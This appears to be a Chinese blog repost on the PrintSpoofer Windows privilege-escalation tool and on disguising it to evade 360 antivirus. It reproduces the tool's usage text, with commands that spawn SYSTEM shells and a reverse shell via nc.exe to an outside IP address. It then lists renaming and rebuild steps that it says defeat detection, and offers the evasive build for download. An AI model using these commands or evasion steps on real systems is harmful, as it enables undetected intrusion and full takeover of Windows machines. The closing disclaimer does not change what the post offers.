1.printspoofer介绍
printspoofer提权工具目前主流的提权工具之一
使用方法
C:TOOLS>PrintSpoofer.exe -h
PrintSpoofer v0.1 (by @itm4n)
Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()
Arguments:
-c <CMD> Execute the command *CMD*
-i Interact with the new process in the current command prompt (default is non-interactive)
-d <ID> Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
-h That's me :)
Examples:
- Run PowerShell as SYSTEM in the current console
PrintSpoofer.exe -i -c powershell.exe
- Spawn a SYSTEM command prompt on the desktop of the session 1
PrintSpoofer.exe -d 1 -c cmd.exe
- Get a SYSTEM reverse shell
PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
源码下载
https://github.com/whojeff/PrintSpoofer
vs2019编译发现360全家桶查杀
2.免杀处理
-
printspoofer 将这个关键词替换成其他字符串 如 moonsec
-
PrintSpoofer.cpp PrintSpoofer.h 全部改为 moonsec
-
帮助注释全部处理掉
-
release x64 重新生成
3.最终效果
3**安全卫士 3**杀毒软件 均没拦截和查杀
免杀处理时间 2020年8月21日
4.下载
关注公众号 回复 printspoofer 即可下载处理好的工具
5.培训项目
暗月的培训体系 目前全部完成 费用2300 有兴趣添加moonsec微信即可
6.正文
不会真的以为没正文图片 不可能的
原文始发于微信公众号(moonsec):printspoofer免杀过360全家桶
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论